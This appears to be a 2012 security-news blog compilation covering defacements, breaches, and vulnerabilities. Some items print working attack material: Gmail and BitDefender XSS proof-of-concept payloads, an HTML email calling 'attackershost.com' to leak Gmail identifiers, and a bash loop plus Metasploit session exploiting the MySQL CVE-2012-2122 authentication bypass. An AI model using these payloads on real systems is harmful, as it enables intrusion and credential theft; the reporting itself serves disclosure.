“Online scams and attacks are on the rise and can occur on any platform with access to the web. AVG aims to protect its users wherever they go. With AVG Family Safety for iOS and Windows Phone, we provide our users the peace of mind that they and their children are protected against online threats on these mobile platforms too.”

One of the best features of AVG Family Safety is the fact that it allows parents not only to monitor their children’s online activities, but also to set up restrictions and set filters across mobile devices and personal computers.

Memory Corruption Vulnerability in Firefox 13


Security researcher Ucha Gobejishvili has discovered a memory corruption vulnerability in Firefox 13, the latest version of Mozilla Firefox.

The vulnerability can be exploited by local privileged user accounts with low user interaction, or remotely via a manipulated HTTP request with high user interaction required.

According to a Softpedia report, the researcher notified Mozilla about the vulnerability. He said that Mozilla confirmed the existence of the vulnerability and planned to fix it in upcoming versions.

In a proof-of-concept video, the researcher showed that launching a specially crafted HTML file triggers the vulnerability, causing a denial-of-service (DoS) state.

In practice, an attacker would have to host a website that contains the malicious webpage. Then, with the aid of cleverly designed emails or instant messages, he could lure potential victims to the website.

The POC video:

Two Pakistani high-profile sites hacked by Silent HaxOR from Indishell

A hacker calling himself Silent Hacker, from Indishell, claimed to have hacked into two high-profile Pakistani websites.

One of the victim sites is the Citizens Police Liaison Committee of Pakistan (http://www.cplc.org.pk/images/). The second is one of Pakistan's biggest advertising and media-buying agencies (timenspacemedia.com).

The mirror of defacements:
http://zone-h.net/mirror/id/17890564

http://arab-zone.net/mirror/101578/timenspacemedia.com/

TweetGif hacked and 10,000 Twitter Users data dumped by LulzSec Reborn



The hacker group known as "LulzSec Reborn" claimed to have hacked into the TweetGif website (tweetgif.com) and compromised its database. TweetGif is a third-party Twitter app that lets users share animated GIFs.

After the breach, the hackers dumped part of the database, containing credentials for more than 10,000 Twitter accounts. The dump contains access tokens and the associated access token secrets, which can be used to access users' Twitter accounts.

The leak also contains usernames, locations, bio information, links to avatars, and the date of the last update.

The tokens remain valid even when the account password is changed. If you used the app, all you need to do is go to Twitter's settings and revoke the app's access; no mass password change is required.

Global Payments Credit card processor finds more trouble from breach



Global Payments Inc. issued another statement, more than two months after it first reported that computer hackers may have compromised data from as many as 1.5 million credit and debit card accounts in North America.

Initially, the company was confident that its estimate of compromised card details was correct. After further investigation, it discovered that the hackers may have accessed personal information belonging to a number of consumers.

“Our ongoing investigation recently revealed potential unauthorized access to personal information collected from a subset of merchant applicants. It is unclear whether the intruders looked at or took any personal information from the company’s systems,” reads the statement.

As an additional precaution, Global Payments said it alerted card issuers about more than 1.5 million potentially affected accounts so they can be on the lookout for suspicious activity.

After the breach, both Visa Inc. and MasterCard Inc. removed Global Payments from their lists of third-party vendors that meet the payment processing industry’s security standards.


VoxAnon IRC Network suffers DDOS Attack

VoxAnon, an IRC community created as a platform to facilitate inter-Anonymous discussion and activities, has experienced a distributed denial of service (DDoS) attack.

“VoxAnon will be back soon! Check this page frequently for updates!” reads a message posted on the main page of VoxAnon.org.


“#VoxAnon is down due to #DDOS Haters will hate. We won't stop doing what we do best,” reads a tweet posted on June 10 by VoxAnon IRC.




According to a report from HOTforSecurity, the DDoS attack may have been launched by other hacktivists who call VoxAnon a platform that security companies and law enforcement monitor.




64-bit OS & virtualization software running on Intel CPU vulnerable to local privilege escalation


A critical security vulnerability has been discovered in 64-bit operating systems and virtualization software running on Intel CPUs, which can lead to local privilege escalation or a guest-to-host virtual machine escape.

The problem affects 64-bit versions of Windows, Linux, FreeBSD and the Xen hypervisor. The flaw seems to affect only Intel hardware; AMD and ARM CPUs are not affected.

"A ring3 attacker may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP)," US-CERT's vulnerability report reads.

"The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP causing a privilege escalation."

Metasploit penetration testing framework founder H.D. Moore characterized the bug as a "serious guest-to-host escape vulnerability," noting that while it affects the Xen platform, it doesn't affect VMware.

To this end, operating system specific details on the vulnerability have been published by Xen, FreeBSD and Microsoft. Linux vendor Red Hat has also published two updates on the problem: RHSA-2012:0720-1 and RHSA-2012:0721-1.

To close the security hole, users should apply updates from their operating system supplier.

Google patched Persistent XSS vulnerabilities in Gmail


Security researcher Nils Junemann discovered persistent cross-site scripting (XSS) vulnerabilities in Gmail and notified Google a few months ago; Google has now patched the vulnerabilities.

According to his blog post, Junemann found three different XSS vulnerabilities in Gmail. The first security flaw is "Persistent DOM XSS (innerHTML) in Gmail's mobile view":

An incoming mail containing <img src=x onerror=prompt(1)> in the subject, when forwarded to another user, led to XSS.

The second one is a very simple non-persistent XSS in Gmail's mobile view:
https://mail.google.com/mail/mu/#cv/search/%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E/foobar

The third security issue is a very interesting persistent XSS. He discovered that there was a way for an attacker to get access to several key pieces of information in the URLs that Gmail generates when it displays a message to a user.

When a message is displayed directly, rather than as part of a user's inbox, it contains both a static user ID and an identifier for the individual message. Those values shouldn't be available to an attacker, but Junemann found that he could get them through referrer leaks.

"An attacker doesn't know the ik and the message id. Without both values it's not possible to generate the special URL. But it's easy to get both values through referer leaking.

We have to send our victim an HTML e-mail with this content:
<img src=" https://attackershost.com/1x1.gif " >
<a href=" https://attackershost.com/gmailxss ">Click here to have fun</a>
<script>alert(/xss/)</script>
When the user opens the email message, the GIF image will send the user ID and message ID to the attacker's server. The second URL will also leak that data if the user clicks on it. The script will then display a Javascript alert, and that's the attacker's code running in the context of Gmail.

#ProjectWestWind : Team GhostShell hacked Italian Government Sites

A Hacker known as Echelon, leader of Team GhostShell, launched a new campaign called ProjectWestWind, an operation aimed at “extreme-right nationalism and racism” in politics.


“As some of you may know (although not nearly as many as it should be), Europe has these past few years been hit by waves of extreme-right nationalism and racism in its political sphere. This includes nationalist political parties like Hungary's ‘Jobbik’, Italy's ‘Lega Nord’ and Finland’s ‘True Finns’,” Echelon said.

“The parties thrive on ignorance and disappointment, and have risen towards power on the wave that was the 2008 economic crisis - just as the NSDAP did during the 30s.”

The first victims of ProjectWestWind, which targets European governments, are a number of state-owned sites from Italy.

One of the targets is the Comune di San Marzano (sanmarzano-ta.gov.it), the site of which has been defaced to display the hackers’ message. Besides altering the website’s main page, Team GhostShell has also leaked more than 100 usernames and password hashes, including the ones of the administrator.

Another target is IV Circolo C.N.Cesaro (cncesaro.gov.it) from which the hackers have leaked 41 record sets comprising usernames, email addresses, names and password hashes.

primocircolovico.gov.it has been taken offline after the group gained access to its databases, publishing 22 login details and 68 entries from a table named “docent.”

Names, usernames, passwords and email addresses have also been stolen from donmilaninapoli.gov.it, istitutodenicola.gov.it, cavaprimocircolo.gov.it and itimarconi.gov.it, all of which have been taken offline.

The Italian government sites haven’t been the only victims of the first phase of ProjectWestWind. The website of the Swedish Vänsterpartiet political party (vansterpartiet.eu) and the one of the Council of Bars and Law Societies of Europe (ccbe.eu) have also been breached. From each of their databases the hackers have made available a handful of login details.

Amazon spam email leads to Blackhole Exploit kit website


Fake Amazon notification mails are hitting inboxes, trying to lure recipients into following links that lead to the Blackhole exploit kit. The emails were spotted by GFI researchers.

The mail may look legitimate. The only thing that gives it away at first glance is that multiple email addresses are included in the "To:" field, while the email is personalized for the first recipient.

The links in the email lead to various legitimate but compromised WordPress domains. Their URLs contain the following path segment:

/wp-content/themes/twentyten/zone(dot)html

The Blackhole exploit code targets Adobe Reader, Flash and Java vulnerabilities. If one of the vulnerable applications is installed on your system, the kit exploits the vulnerability and infects the system.


Intruders break into University of North Florida

The University of North Florida (UNF) has started sending out email notifications after learning that a database containing information about people who submitted contracts to live in the UNF residence halls may have been compromised.

UNF has now secured the servers, but an investigation shows the information could have been accessed as early as spring 2011. The potentially compromised data includes approximately 23,000 names and Social Security numbers of people who submitted a housing contract between 1997 and spring 2011.

The institution has also made available a frequently asked questions (FAQ) page to offer further clarifications on the incident.

To help the potential victims, UNF is covering the cost of an identity protection service for one year, which includes a credit report, daily 3-bureau credit monitoring, identity theft resolution, ExtendCARE and $1 million identity theft insurance.


"Hello Dear": a DHL notification mail leads to malware infection



Epic fail: a mail purportedly coming from DHL informs the user that delivery processing completed successfully. In truth the mail does not come from DHL, and the opening words give it away: the mail starts with "Hello Dear".

The spam mail:

Hello Dear,

DHL Express Tracking Notification: Mon, 11 Jun 2012 12:14:55 +0200

Custom Reference: 9057425-HRIEI2E4Q8C
Tracking Number: UT09-2041042911
Pickup Date: Mon, 11 Jun 2012 12:14:55 +0200
Service: AIR/GROUND
Pieces: 2

Mon, 11 Jun 2012 12:14:55 +0200 - Processing complete successfully
PLEASE REFER TO ATTACHED FILE FOR DETAILED INFORMATION.

Shipment status may also be obtained from our Internet site in USA under http://track.dhl-usa.com or Globally under http://www.dhl.com/track

Please do not reply to this email. This is an automated application used only for sending proactive notifications

Thanks in advance,
DHL Express International Inc.

The mail has a zip file attachment which contains malware. Sophos products detect the Windows malware as Troj/Agent-WMO. The attached filename can vary, but takes the form DHL_International_Delivery_Details-[random code].zip.

A typical email has a subject line of "DHL Express Parcel Tracking notification [random code]", "DHL Express Tracking Notification ID [random code]" or "DHL International Notification for shipment [random code]".


Karachi News website hacked by nyro hacker and Army Of Destruction

A hacker calling himself Nyro Hacker broke into Pakistan's premier news web portal, Karachi News (karachinews.com.pk), and defaced the website.

At the time of writing, the website displays an "under construction" message on its main page.

A mirror of the defacement is available at zone-h:
http://arab-zone.net/mirror/107910/karachinews.com.pk/


7 Philippines Govt. Sites hacked to protest against anti-hacking bill


The hacker group "PrivateX", a coalition of local hacker groups HukbalaHack, Anonymous, PrivateX and Philkers, hacked seven Philippine government websites on Independence Day in protest against a new anti-cybercrime bill.

According to GMA News, the websites affected are the City Government of Mandaluyong's website (mandaluyong.gov.ph), the website of the Office of the Ombudsman (omb.gov.ph) and the Philippine Anti-Piracy Team website (papt.org.ph).

Philippine Nuclear Research Institute website (pnri.dost.gov.ph), the National Food Authority website (nfa.gov.ph), the Senate Electoral Tribunal website (set.gov.ph), and a Department of Health website (smokefree.gov.ph) have also been breached.

Whenever users accessed the above-mentioned websites, they were redirected to another page carrying PrivateX's defacement message.

The hacktivists fear that in its current form, the bill could be used as “a tool of censorship” which could pose a threat to freedom of expression.

"We're not against the government's intention to combat fraudulence, related forms of it and other serious cyber crimes, but we're absolutely against its provision that has something to do with the internet's freedom of expression (sic)," the hackers said on the defacement page.

OpenVPN official site hacked by HCJ


The official website of OpenVPN has been defaced by hackers apparently led by HcJ. OpenVPN is an open source software application that implements virtual private network (VPN) techniques for creating secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities.

The hackers didn't state a reason for the attack, but wrote the message "No News Is a Good News" on the defacement page, along with a “quote of the day” that read:

"Don’t be lammer, Leave your computer and enjoy your summer ./ HcJ"

At press time, the OpenVPN.com website had been restored and was back online. A mirror of the defacement is available at Zone-H.

It’s uncertain at this time if the hackers have gained access to information stored in the website’s databases.

The official website of the State of Louisiana hacked by Zer0Pwn

The hacker known as Zer0Pwn has managed to gain unauthorized access to the official website of the State of Louisiana (Louisiana.gov).

The hacker dumped the compromised database on Pastebin. The dump includes emails, passwords, root users and administrator credentials.

http://pastebin.com/Ubg8GnKG

He also claimed to have found an XSS vulnerability in SubjectPlus, a web application used mostly by educational websites, and posted the proof of concept on Pastebin.

Alaska.edu vulnerable to SQL injection


A grey-hat hacker called 'G4mbi7' discovered an SQL injection vulnerability in the Alaska Volcano Observatory website.

According to the hacker's report, the site was vulnerable to blind SQL injection. He found the vulnerability a few months ago, but no patch followed, so he decided to notify the administrator and sent a report with details of the vulnerability. A week later, the administrator patched it.


Flame and Stuxnet malware unleashed by same Master


The two infamous pieces of malware, Flame and Stuxnet, were unleashed by the same master, says Kaspersky Labs, which has discovered an identical piece of code in both worms. What appeared to be two unrelated programs are probably part of the same cyberwar campaign.

Experts spotted the Flame malware last month. Initially they didn't consider the two pieces of malware related, because Stuxnet (and Duqu) were built on the Tilded platform while Flame was not.

However, researchers have since unearthed previously unknown facts that completely transform the current view of how Stuxnet was created and its link with Flame.

Even though the two viruses are built on completely different platforms and most likely developed independently, they shared key pieces of code during the development process, the security firm explained.

The finding in question relates to “Resource 207,” a module found in earlier versions of Stuxnet that bears a “striking resemblance” to Flame, including “names of mutually exclusive objects, the algorithm used to decrypt strings and similar approaches to file naming.”

"The new findings that reveal how the teams shared the source code of at least one module in the early stages of development prove that the groups co-operated at least once," wrote Aleksandr Gostev, chief security expert for Russian security company Kaspersky Labs.

More details about the analysis can be found here.


A critical Security vulnerability in MySQL/MariaDB [CVE-2012-2122]


Security researchers have revealed a serious security vulnerability in MariaDB and MySQL that enables an attacker to gain root access to the database server. The vulnerability has been assigned CVE-2012-2122.

According to Sergei Golubchik, security coordinator at MariaDB, the flaw doesn’t affect official vendor binaries, but it does expose the customers of MariaDB and MySQL who use versions such as 5.1.61, 5.2.11, 5.3.5, 5.5.22 and prior.


This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -127 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied.
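The memcmp() assumption above is easier to see in a runnable model. This is an added Python re-enactment of the same arithmetic, not MySQL's code (which is C): word_memcmp stands in for an optimized memcmp that returns large differences, to_my_bool models the char-sized my_bool the result was stored in, and the random "reassured" hashes standing for wrong-password attempts are constructed.

```python
"""Model of the CVE-2012-2122 comparison bug (added example; MySQL's real
code is C, this re-enacts the arithmetic in Python).

check_scramble() handed memcmp()'s int result back through my_bool, a char.
With a memcmp() that returns the raw difference of the first differing word,
one result in 256 has a zero low byte and therefore reads as "equal".
"""
import hashlib
import random
import struct

SHA1_HASH_SIZE = 20


def word_memcmp(a: bytes, b: bytes) -> int:
    """Stand-in for an optimized memcmp(): compares 32-bit words and returns
    the full difference of the first pair that differs. Values far outside
    -127..127 are exactly what the vulnerable build assumed could not happen."""
    assert len(a) == len(b) == SHA1_HASH_SIZE
    for off in range(0, SHA1_HASH_SIZE, 4):
        (wa,) = struct.unpack_from("<I", a, off)
        (wb,) = struct.unpack_from("<I", b, off)
        if wa != wb:
            return wa - wb
    return 0


def to_my_bool(value: int) -> int:
    """Truncate an int to a signed char, as storing it in my_bool did."""
    return ((value & 0xFF) ^ 0x80) - 0x80


def check_scramble_buggy(stage2: bytes, reassured: bytes) -> bool:
    """Vulnerable shape: the int result is truncated to a char first and
    tested afterwards, so -256, 256, 512, ... all read as 'hashes match'."""
    return to_my_bool(word_memcmp(stage2, reassured)) == 0


def check_scramble_fixed(stage2: bytes, reassured: bytes) -> bool:
    """Fixed shape: decide equality at int width (memcmp(...) != 0 in C) and
    only then hand a clean true/false back to the caller."""
    return word_memcmp(stage2, reassured) == 0


def simulate_wrong_passwords(attempts: int, seed: int = 2012) -> int:
    """Count how many wrong-password attempts the buggy check lets through.
    A wrong password makes the reassured hash effectively random, so the
    acceptance rate should land near the 1 in 256 quoted in the text."""
    rng = random.Random(seed)  # fixed seed: the run is reproducible
    # stage2 = SHA1(SHA1(password)), the value the server keeps (constructed)
    stage2 = hashlib.sha1(hashlib.sha1(b"constructed-correct-password").digest()).digest()
    accepted = 0
    for _ in range(attempts):
        reassured = bytes(rng.getrandbits(8) for _ in range(SHA1_HASH_SIZE))
        if check_scramble_buggy(stage2, reassured):
            accepted += 1
    return accepted


if __name__ == "__main__":
    n = 25600
    hits = simulate_wrong_passwords(n)
    print(f"buggy check accepted {hits} of {n} wrong passwords (expected about {n // 256})")
    zero = bytes(SHA1_HASH_SIZE)
    off_by_256 = b"\x00\x01" + bytes(SHA1_HASH_SIZE - 2)  # first word differs by 256
    print("buggy:", check_scramble_buggy(zero, off_by_256), "fixed:", check_scramble_fixed(zero, off_by_256))
```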

The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

Caveats and Defense

The first rule of securing MySQL is to not expose it to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network without any form of host-based access control.


If you are responsible for a MySQL server that is currently exposed to the network unnecessarily, the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the "bind-address" parameter to "127.0.0.1". Restart the MySQL service to apply this setting.

Exploit Module for PenTesters:
This evening Jonathan Cran (CTO of Pwnie Express and Metasploit contributor) committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes. A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.


$ msfconsole

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root

msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1

msf auxiliary(mysql_authbypass_hashdump) > run



[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test

[*] 127.0.0.1:3306 Authentication bypass is 10% complete

[*] 127.0.0.1:3306 Authentication bypass is 20% complete

[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts

[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89

[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Reference:
Rapid7


NEA.gov & Department of Public Enterprise of South Africa hacked by Zer0Pwn


The hacker known as Zer0Pwn hacked two government sites and compromised their databases. The National Endowment for the Arts and the Department of Public Enterprise of South Africa were exploited via SQL injection vulnerabilities.

The hacker dumped the database belonging to the Department of Public Enterprise of South Africa on Pastebin. The leak contains database details along with usernames and passwords. Unfortunately, the passwords are in plain text.

The dump belonging to the National Endowment for the Arts website contains the MySQL root username, hashed password and host details.

UACRAO website hacked by Mr. Security

A hacker called Mr. Security has hacked into the official site of the Utah Association of Collegiate Registrars and Admissions Officers (UACRAO) and compromised its database.

He dumped the database on AnonPaste. The leak contains usernames and passwords, as well as details about the database.

"Things like this happen all day long, every day of the year. Just don't make a mess of it and secure the shit. Times of friendly hackers is over, due to the FBI and police that arrested them. The age of the new hackers, has begun," the hacker said in the leak.


WebSploit Toolkit Version 1.8 Released


Fardin OxOptimOus has released version 1.8 of the WebSploit Toolkit. WebSploit is an open source project for scanning and analyzing remote systems for vulnerabilities.

Web tools operations added:

  • phpMyAdmin login page finder
  • Directory scanner
  • Apache user directory scanner



Fixed bugs:

  • small keyboard control bug fixed
  • update bug fixed
  • ettercap path for BackBox fixed

Download it from here:
http://sourceforge.net/projects/websploit/files/latest/download


League of Legends Online game website hacked


Hackers breached the official website of the online real-time strategy game League of Legends (from Riot Games). Riot Games issued a security warning on its official site.

According to the statement, the hackers gained access to certain personal player data contained in certain EU West and EU Nordic & East databases.


"The most critical data accessed included email address, encrypted account password, summoner name, date of birth, and – for a small number of players – first and last name and encrypted security question and answer," the statement reads.

"Absolutely no payment or billing information of any kind was included in the breach."

After further investigation, Riot determined that more than half of the passwords were simple enough to be at risk of easy cracking. As a security precaution, Riot Games sent an email to all players on these platforms, and has fixed the specific security issue that the hackers exploited.

eHarmony Works with Law Enforcement in Password Leak Investigation

After the database leak from the eHarmony website, eHarmony released an updated statement saying that it is investigating the hack with the help of law enforcement authorities.


“We have also been working with law enforcement authorities in our investigation and have been in touch with one of the other companies affected as well,” eHarmony’s Blog post reads.

Similar to LinkedIn and Last.fm, eHarmony is also reluctant to provide exact details. However, it has taken certain steps to remove the risks posed by the incident.

While they fail to provide the exact number of impacted individuals, they highlight the fact that the “small percentage of affected accounts” have been secured by disabling their passwords.

They sent an email to all affected members and provided them with specific instructions on how to change their password and tips on how to create a robust password. The email also included a direct phone number and live online chat access to the Customer Care team so that concerns and questions could be addressed personally.

XSS Vulnerability found in 4 Antivirus websites



Security researcher Ankit Sharma has discovered cross-site scripting vulnerabilities in four antivirus websites.

The official websites of BitDefender, AVG, Avira and Total Defense Antivirus are vulnerable to XSS.



In BitDefender TrafficLight, the url parameter is not filtered for XSS, so it allows attackers to run malicious script in the page. This can be used for phishing attacks.

POC:
http://trafficlight.bitdefender.com/info?url=%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29%3C/SCRIPT%3E




50+ Pakistani sites hacked by Silent Hacker from indishell

A hacker called 'Silent Hacker', from the Indian hacker group 'indiShell', has hacked into more than 50 Pakistani sites, including some high-profile ones, and defaced all of them.


“t0pp8uzz” and “GM” Sentenced to Jail for Running Fraud Website

Jay Moore, known by his online moniker t0pp8uzz, and his accomplice Damian Horne, aka GM, have been sentenced to jail after investigators accused them of running a fraud website estimated to be worth £26.9 million ($41 million or 33.2 million EUR).

According to the UK's Serious Organised Crime Agency (SOCA), Moore pleaded guilty to 12 fraud-related charges, hacking, and money laundering and received a 3-year jail sentence. Horne received 21 months after he also pleaded guilty.

The fraudsters made a lot of money after Moore launched the Freshshop, a site that brokered the sale of stolen financial information. Horne was his right-hand man, in charge of "assisting" him.

They started timidly with selling stolen iTunes vouchers and online gaming codes on eBay, but soon enough they expanded their criminal activities to commercializing credit card details. To reach their goals, they relied on a network of bank accounts, online financial institutions and money exchange companies from abroad.

The Freshshop the cybercriminals were running looked like any other online retail store, but instead of the usual items, they were actually selling credit card data.

The valuable information was obtained not only from their own hacking operations, but also from other individuals who were looking for a way to sell the data they had stolen by breaching websites.

When authorities raided Moore’s home back in 2011, they found tens of thousands of pounds in cash, along with a number of computers connected to the Freshshop. They also found the card details of around 340,000 individuals.

He apparently gave his father around £40,000 (49,000 EUR or $61,000) to help him purchase a farm house and he bought a luxury car for himself. The fraudster told his parents that the money came from his apparently legit web design business.

Besides Moore and Horne, investigators have identified two other individuals, friends with the mastermind, who have been recruited to collect money from Western Union locations in Bristol.

Currently, SOCA is trying to identify the other cybercriminals who have been using the fraud site.


16th June 2012 null Bangalore Monthly meetup

Hi All,

We will have this month's null/OWASP/Garage4hackers/SecurityXploded
Bangalore meetup on Saturday 16th June 2012 starting at 10:00 AM. No
registrations, no fees, just come with an open mind :)

The Bangalore meet, as usual, is divided into 2 parts, the monthly
talks and the Training on Reverse Engineering. The Reverse Engineering
training will start at 12:45 PM by the SecurityXploded/
Garage4Hackers team.

Also, as discussed in the last month's meet, we will have a basic 30
minute primer on SQL Injection by Satish at 9:30 AM, before the main
talks begin at 10:00 AM. All those who would be interested to learn,
understand the basics of SQL Injection and to watch some cool demos
are requested to be present at 9:30 AM.

TALKS
1. News Bytes - Sumeer
2. JavaScript Obfuscation - Prasanna
3. SSL VPNs - Rajesh

12:45 PM onwards:
4. Practical Reversing: Part3 - Memory Forensics - Monnappa


VENUE DETAILS
Kieon, 3rd Floor, 302 Prestige Sigma,
3 Vittal Mallya Road,
Bangalore 560001
Opposite Bishop Cottons Girls School, Above Emirates Airlines office.

Map Location: http://g.co/maps/dahhv

Parking is available in the building. See you there.

Last.fm hacked and passwords leaked


Music-streaming website Last.fm has issued a warning to its users to change their passwords immediately after a password leak.

"We are currently investigating the leak of some Last.fm user passwords," the firm said in a note on its website.

"This follows recent password leaks on other sites, as well as information posted online. As a precautionary measure, we're asking all our users to change their passwords immediately."


The site recommends that users change their password on the settings page. It also said it does not email customers with direct links to update settings or provide passwords: any email that purports to be from Last.fm and requests information is likely a phishing message from scammers after your personal information.

"We’re sorry for the inconvenience around changing your password; Last.fm takes your privacy very seriously. We’ll be posting updates in our forums and via our Twitter account (@lastfm) as we get to the bottom of this."


Serbian Bank website hacked by Sepo


A hacker known as SEPO (@anon_4freedom) hacked the Serbian Bank website (www.srpskabanka.rs) and compromised its database.

Serbian Bank s.c. has been present in the domestic financial market for several decades and, as such, is considered one of the most important institutions in corporate and retail banking. Developed from the Military Department of the National Bank of Yugoslavia, which provided services to the entire Yugoslav military industry, the bank operated under the name Yu Garant Banka for a short period and has operated under its present name since 2003.

He dumped the database on his own website. The leak contains confidential data including usernames, hashed passwords and database details.



AT&T Hacked by Team Digi7al

The hacker collective known as 'TeamDigi7al' claims to have gained unauthorized access to the AT&T website and compromised its database.

The hackers leaked part of the stolen data in text format. The leak contains personal details including names, addresses, mobile numbers and email addresses. They also leaked details about the vulnerability and the database.

"Well it just goes to show you, anything is vulnerable. You just have to know where to look." Hacker said.

"The information in this dump isn't even 1% of whats in here, I just didn't feel like dumping tens of thousands of names, emails, addresses, mobile numbers (you get my point)."

LinkedIn confirms some passwords have been compromised

LinkedIn has confirmed that the passwords belonging to "some" of its members have been compromised.
"We can confirm that some of the passwords that were compromised correspond to LinkedIn accounts. We are continuing to investigate this situation," LinkedIn's blog post reads.

Affected members will receive an email with instructions on how to reset their passwords; current passwords will not work. They will also receive an email that provides a bit more context on this situation and why they are being asked to change their passwords.

The company did not confirm how many passwords were involved, though it reportedly affected about 6 million of LinkedIn's 161 million users.

8 more Pakistan sites hacked by Nyro Hacker

A hacker known as 'Nyro Hacker' has hacked and defaced eight more Pakistani websites.


At the time of writing, visiting the affected sites prompts for a password.